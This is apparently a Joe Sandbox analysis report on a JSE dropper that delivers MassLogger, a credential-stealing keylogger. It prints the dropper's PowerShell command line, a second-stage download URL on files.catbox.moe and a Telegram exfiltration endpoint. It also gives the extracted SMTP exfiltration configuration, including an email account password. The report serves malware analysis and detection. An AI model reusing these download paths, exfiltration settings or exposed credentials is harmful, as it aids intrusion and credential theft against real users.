Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
1C24TDP_000000029.jse

Overview

General Information

Sample name:1C24TDP_000000029.jse
Analysis ID:1586897
MD5:ffb57c052a985d3e7b43502f4e07376c
SHA1:fd80160aa4ab95c55fd0002b4705816c6c7fe1fd
SHA256:2861bc7808cb4308c951499b8709ce15c8dd56e551183e5d75adf1a7b825fe07
Tags:jseuser-threatinte1
Infos:

Detection

MassLogger RAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: RegAsm connects to smtp port
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected MassLogger RAT
Yara detected Telegram RAT
AI detected suspicious sample
Allocates memory in foreign processes
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
JavaScript source code contains functionality to generate code involving a shell, file or stream
Machine Learning detection for dropped file
PE file contains section with special chars
PE file has nameless sections
Powershell drops PE file
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 7408 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1C24TDP_000000029.jse" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7500 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • x.exe (PID: 7660 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: 9FB7455B1C6CB563FF7E58F422F3BC6E)
        • RegAsm.exe (PID: 7696 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
        • RegAsm.exe (PID: 7704 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup
{"EXfil Mode": "SMTP", "From": "mtb.food@phobinh.com.vn", "Password": "danh@PB289", "Server": "mail.phobinh.com.vn", "To": "office@handtool.com.vn", "Port": 587}
SourceRuleDescriptionAuthorStrings
00000005.00000002.2954889614.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
    00000005.00000002.2954889614.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000005.00000002.2954889614.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000005.00000002.2954889614.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
        • 0xefb7:$a1: get_encryptedPassword
        • 0xf2df:$a2: get_encryptedUsername
        • 0xed52:$a3: get_timePasswordChanged
        • 0xee73:$a4: get_passwordField
        • 0xefcd:$a5: set_encryptedPassword
        • 0x10929:$a7: get_logins
        • 0x105da:$a8: GetOutlookPasswords
        • 0x103cc:$a9: StartKeylogger
        • 0x10879:$a10: KeyLoggerEventArgs
        • 0x10429:$a11: KeyLoggerEventArgsEventHandler
        00000005.00000002.2956937742.0000000002DE5000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Click to see the 14 entries
          SourceRuleDescriptionAuthorStrings
          5.2.RegAsm.exe.400000.0.unpackJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
            5.2.RegAsm.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              5.2.RegAsm.exe.400000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                5.2.RegAsm.exe.400000.0.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                • 0xf1b7:$a1: get_encryptedPassword
                • 0xf4df:$a2: get_encryptedUsername
                • 0xef52:$a3: get_timePasswordChanged
                • 0xf073:$a4: get_passwordField
                • 0xf1cd:$a5: set_encryptedPassword
                • 0x10b29:$a7: get_logins
                • 0x107da:$a8: GetOutlookPasswords
                • 0x105cc:$a9: StartKeylogger
                • 0x10a79:$a10: KeyLoggerEventArgs
                • 0x10629:$a11: KeyLoggerEventArgsEventHandler
                5.2.RegAsm.exe.400000.0.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
                • 0x14165:$a2: \Comodo\Dragon\User Data\Default\Login Data
                • 0x13663:$a3: \Google\Chrome\User Data\Default\Login Data
                • 0x13971:$a4: \Orbitum\User Data\Default\Login Data
                • 0x14769:$a5: \Kometa\User Data\Default\Login Data
                Click to see the 30 entries

                Networking

                barindex
                Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 123.30.244.30, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Initiated: true, ProcessId: 7704, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49736

                System Summary

                barindex
                Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 108.181.20.35, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 7408, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1C24TDP_000000029.jse", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1C24TDP_000000029.jse", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1C24TDP_000000029.jse", ProcessId: 7408, ProcessName: wscript.exe
                Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 108.181.20.35, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 7408, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
                Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1C24TDP_000000029.jse", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1C24TDP_000000029.jse", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1C24TDP_000000029.jse", ProcessId: 7408, ProcessName: wscript.exe
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1C24TDP_000000029.jse", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7408, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1", ProcessId: 7500, ProcessName: powershell.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-09T18:33:11.533811+010020188561A Network Trojan was detected108.181.20.35443192.168.2.449730TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-09T18:33:19.821960+010028032742Potentially Bad Traffic192.168.2.449731132.226.247.7380TCP
                2025-01-09T18:33:26.440288+010028032742Potentially Bad Traffic192.168.2.449731132.226.247.7380TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-09T18:33:11.356574+010028275781A Network Trojan was detected192.168.2.449730108.181.20.35443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: C:\Users\user\AppData\Local\Temp\x.exeAvira: detection malicious, Label: TR/Dropper.Gen
                Source: 5.2.RegAsm.exe.400000.0.unpackMalware Configuration Extractor: MassLogger {"EXfil Mode": "SMTP", "From": "mtb.food@phobinh.com.vn", "Password": "danh@PB289", "Server": "mail.phobinh.com.vn", "To": "office@handtool.com.vn", "Port": 587}
                Source: 1C24TDP_000000029.jseReversingLabs: Detection: 13%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: C:\Users\user\AppData\Local\Temp\x.exeJoe Sandbox ML: detected

                Location Tracking

                barindex
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49732 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 108.181.20.35:443 -> 192.168.2.4:49730 version: TLS 1.2

                Software Vulnerabilities

                barindex
                Source: 1C24TDP_000000029.jseArgument value : ['"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\\Temp\\dddddd.ps1"",0,true']Go to definition
                Source: 1C24TDP_000000029.jseArgument value : ['"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\\Temp\\dddddd.ps1"",0,true', '"WScript.Shell"']Go to definition
                Source: 1C24TDP_000000029.jseArgument value : ['"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\\Temp\\dddddd.ps1"",0,true', '"WScript.Shell"', '"Scripting.FileSystemObject"']Go to definition
                Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 02AA5782h5_2_02AA5358
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 02AA51B9h5_2_02AA4F08
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 02AA5782h5_2_02AA56AF

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2827578 - Severity 1 - ETPRO MALWARE Likely Dropper Doc GET to .moe TLD : 192.168.2.4:49730 -> 108.181.20.35:443
                Source: Network trafficSuricata IDS: 2018856 - Severity 1 - ET MALWARE Windows executable base64 encoded : 108.181.20.35:443 -> 192.168.2.4:49730
                Source: C:\Windows\System32\wscript.exeNetwork Connect: 108.181.20.35 443Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.4:49736 -> 123.30.244.30:587
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 108.181.20.35 108.181.20.35
                Source: Joe Sandbox ViewIP Address: 104.21.96.1 104.21.96.1
                Source: Joe Sandbox ViewASN Name: VNPT-AS-VNVietnamPostsandTelecommunicationsVNPTVN VNPT-AS-VNVietnamPostsandTelecommunicationsVNPTVN
                Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                Source: unknownDNS query: name: checkip.dyndns.org
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49731 -> 132.226.247.73:80
                Source: global trafficTCP traffic: 192.168.2.4:49736 -> 123.30.244.30:587
                Source: global trafficHTTP traffic detected: GET /jqxrkk.ps1 HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: files.catbox.moeConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49732 version: TLS 1.0
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /jqxrkk.ps1 HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: files.catbox.moeConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficDNS traffic detected: DNS query: files.catbox.moe
                Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                Source: global trafficDNS traffic detected: DNS query: mail.phobinh.com.vn
                Source: RegAsm.exe, 00000005.00000002.2956937742.0000000002D40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                Source: RegAsm.exe, 00000005.00000002.2956937742.0000000002D40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.comd
                Source: RegAsm.exe, 00000005.00000002.2956937742.0000000002DE5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2956937742.0000000002D2E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2956937742.0000000002D40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                Source: RegAsm.exe, 00000005.00000002.2956937742.0000000002CC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                Source: RegAsm.exe, 00000005.00000002.2956937742.0000000002DE5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2956937742.0000000002D40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/d
                Source: x.exe, 00000003.00000002.1818233805.00000000044C4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2954889614.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                Source: RegAsm.exe, 00000005.00000002.2956937742.0000000002D40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.orgd
                Source: RegAsm.exe, 00000005.00000002.2956937742.0000000002DE5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2960829477.0000000006280000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2961090664.00000000062BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                Source: RegAsm.exe, 00000005.00000002.2961090664.00000000062BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                Source: RegAsm.exe, 00000005.00000002.2956937742.0000000002DE5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2960829477.0000000006280000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2961090664.00000000062BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
                Source: RegAsm.exe, 00000005.00000002.2956937742.0000000002DE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.phobinh.com.vn
                Source: RegAsm.exe, 00000005.00000002.2956937742.0000000002DE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.phobinh.com.vnd
                Source: RegAsm.exe, 00000005.00000002.2956937742.0000000002DE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail24430.maychuemail.com
                Source: RegAsm.exe, 00000005.00000002.2956937742.0000000002DE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail24430.maychuemail.comd
                Source: powershell.exe, 00000001.00000002.1825590684.000001DCB77F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1799980815.000001DCA908A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1825590684.000001DCB7590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: RegAsm.exe, 00000005.00000002.2956937742.0000000002DE5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2960829477.0000000006280000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2961090664.00000000062BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                Source: RegAsm.exe, 00000005.00000002.2956937742.0000000002DE5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2960829477.0000000006280000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2961090664.00000000062BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0-
                Source: powershell.exe, 00000001.00000002.1799980815.000001DCA9030000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1799466056.000001DCA7449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: RegAsm.exe, 00000005.00000002.2956937742.0000000002D5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
                Source: RegAsm.exe, 00000005.00000002.2956937742.0000000002D5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.orgd
                Source: powershell.exe, 00000001.00000002.1799980815.000001DCA7511000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2956937742.0000000002CC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000001.00000002.1799980815.000001DCA8CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: powershell.exe, 00000001.00000002.1799980815.000001DCA9030000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1799466056.000001DCA7449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: powershell.exe, 00000001.00000002.1799980815.000001DCA7511000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                Source: RegAsm.exe, 00000005.00000002.2956937742.0000000002DE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                Source: x.exe, 00000003.00000002.1818233805.00000000044C4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2954889614.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
                Source: powershell.exe, 00000001.00000002.1825590684.000001DCB7590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000001.00000002.1825590684.000001DCB7590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000001.00000002.1825590684.000001DCB7590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: wscript.exe, 00000000.00000003.1836905195.000001E2133EA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1728680537.000001E21344E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1728680537.000001E21341F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1728564793.000001E21341B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1836134689.000001E212C55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://files.catbox.moe
                Source: wscript.exe, 00000000.00000002.1839683434.000001E2133EB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1836905195.000001E2133EA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1728680537.000001E21344E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://files.catbox.moe/
                Source: wscript.exe, 00000000.00000003.1728680537.000001E21344E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://files.catbox.moe/9
                Source: wscript.exe, 00000000.00000003.1836877929.000001E210DA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1835743221.000001E210DC8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1834430753.000001E210E1D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1836134689.000001E212C55000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1835043827.000001E212B6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1712270321.000001E212B43000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1836567182.000001E210DBA000.00000004.00000020.00020000.00000000.sdmp, 1C24TDP_000000029.jseString found in binary or memory: https://files.catbox.moe/jqxrkk.ps1
                Source: wscript.exe, 00000000.00000003.1712270321.000001E212B50000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1839074641.000001E212B4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1712341931.000001E212B50000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1835122772.000001E212B4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://files.catbox.moe/jqxrkk.ps1u
                Source: wscript.exe, 00000000.00000002.1839683434.000001E2133EB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1836905195.000001E2133EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://files.catbox.moe/u
                Source: wscript.exe, 00000000.00000003.1836905195.000001E2133EA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1728680537.000001E21344E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1728680537.000001E21341F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1728564793.000001E21341B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1836134689.000001E212C55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://files.catbox.moe;
                Source: powershell.exe, 00000001.00000002.1799980815.000001DCA9030000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1799466056.000001DCA7449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: wscript.exe, 00000000.00000002.1839683434.000001E2133EB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1836905195.000001E2133EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                Source: powershell.exe, 00000001.00000002.1825590684.000001DCB77F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1799980815.000001DCA908A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1825590684.000001DCB7590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: powershell.exe, 00000001.00000002.1799980815.000001DCA8CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
                Source: powershell.exe, 00000001.00000002.1799980815.000001DCA8CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
                Source: RegAsm.exe, 00000005.00000002.2956937742.0000000002D40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                Source: x.exe, 00000003.00000002.1818233805.00000000044C4000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2954889614.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2956937742.0000000002D40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                Source: RegAsm.exe, 00000005.00000002.2956937742.0000000002D40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189d
                Source: RegAsm.exe, 00000005.00000002.2956937742.0000000002D40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189l
                Source: RegAsm.exe, 00000005.00000002.2956937742.0000000002DE5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2960829477.0000000006280000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2961090664.00000000062BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                Source: unknownHTTPS traffic detected: 108.181.20.35:443 -> 192.168.2.4:49730 version: TLS 1.2

                System Summary

                barindex
                Source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
